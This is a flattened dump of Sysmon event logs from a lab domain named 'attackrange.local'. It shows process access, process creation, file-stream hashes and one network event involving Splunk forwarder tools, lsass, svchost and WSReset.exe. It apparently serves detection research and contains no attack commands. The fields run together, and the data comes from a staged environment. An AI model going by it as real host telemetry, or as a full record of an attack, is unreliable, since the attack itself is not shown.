08:05:53.573{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054112Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:53.573{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054111Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:53.573{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F7E1-60EB-E37D-00000000CF01}9832C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054110Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:53.573{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7E1-60EB-E37D-00000000CF01}9832C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054109Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:53.568{466BC892-F7E1-60EB-E37D-00000000CF01}9832C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054130Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:54.990{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2A1E5E280AA10E6C544721883C560CDE,SHA256=64D43B339F81477921F41E257EFB70F1707292E562A444334A2239731A9874CE,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001054129Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:54.790{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E41A270A1E20C2826848814E710DA87,SHA256=4862AB026971C70A759D8780096D1B237196EA2B69A842207EB5B9E4E9A7AA68,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054128Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:45.656{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61940-false10.0.1.12-8000- 10341000x80000000000000001054127Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:54.105{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7E2-60EB-E47D-00000000CF01}4920C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054126Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:54.105{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054125Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:54.105{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054124Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:54.105{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054123Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:54.105{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054122Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:54.105{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F7E2-60EB-E47D-00000000CF01}4920C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054121Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:54.105{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7E2-60EB-E47D-00000000CF01}4920C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054120Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:54.091{466BC892-F7E2-60EB-E47D-00000000CF01}4920C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810040Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:54.042{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35B5D10D986CB21D1874DABD9817CFDD,SHA256=113CE6C0D8E093CB6E028518D525D54CB3841D432FCAC8261AEF36BC1F49C9B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054132Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:55.791{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6180FE22DBAA0461048F95532CD654A,SHA256=2EF94924A4E3D981C2DF69E549BFD5932AA21D62982471B27D2ED12B73B7115E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810041Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:55.073{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40F9AF77F6D295C77E1D207514C2DA2E,SHA256=6EDE46429581EE9FB87ECC836FF8B88E4B911C398C2B8A4CC7F5C898A69D3F7D,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001054131Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:55.090{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6C58A67829AABA8B4C5D2C6982345900,SHA256=633C3AD2FC6A7536453EF366592152F7148493CAC94FF0A89DB25A499E1C4F82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054133Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:56.821{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A084908460CB88A3ED5CB1DF0395D6A,SHA256=E6EA7D2B53A6CD19274F83C5A3B2582879E0C6A8A523AAD41CD4AEA41B71843A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810042Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:56.120{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFA5E2B5C151BDFAF20B93A989649720,SHA256=F464FB2F252D6547D6A81B4D99BE6E5DC2B9A6727D709A510BA07102DB9A4A0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054135Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:57.839{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADF203FC0C64117D8482301AF686ED73,SHA256=795895F007D137399E7926B97019A0BA79F293F935137E5ACA38072EC55FC48B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810043Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:57.120{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7094D7D921204D30783FD315858CAA1,SHA256=30E4B97EF917576616FCD782C5076EAA25F600EE6A1E1672F5F68D86EE87EE69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054134Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:57.305{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054152Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:58.973{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7E6-60EB-E57D-00000000CF01}9544C:\Windows\system32\WSReset.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054151Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.973{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7E6-60EB-E57D-00000000CF01}9544C:\Windows\system32\WSReset.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054150Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:58.941{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F7E6-60EB-E57D-00000000CF01}9544C:\Windows\system32\WSReset.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054149Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.941{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F7E6-60EB-E57D-00000000CF01}9544C:\Windows\system32\WSReset.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054148Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:58.941{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F7E6-60EB-E57D-00000000CF01}9544C:\Windows\system32\WSReset.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054147Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.904{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F7E6-60EB-E67D-00000000CF01}2492C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054146Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.904{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F7E6-60EB-E67D-00000000CF01}2492C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054145Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:58.904{466BC892-F7E6-60EB-E67D-00000000CF01}24929948C:\Windows\system32\conhost.exe{466BC892-F7E6-60EB-E57D-00000000CF01}9544C:\Windows\system32\WSReset.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054144Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.889{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F7E6-60EB-E67D-00000000CF01}2492C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054143Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.889{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054142Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
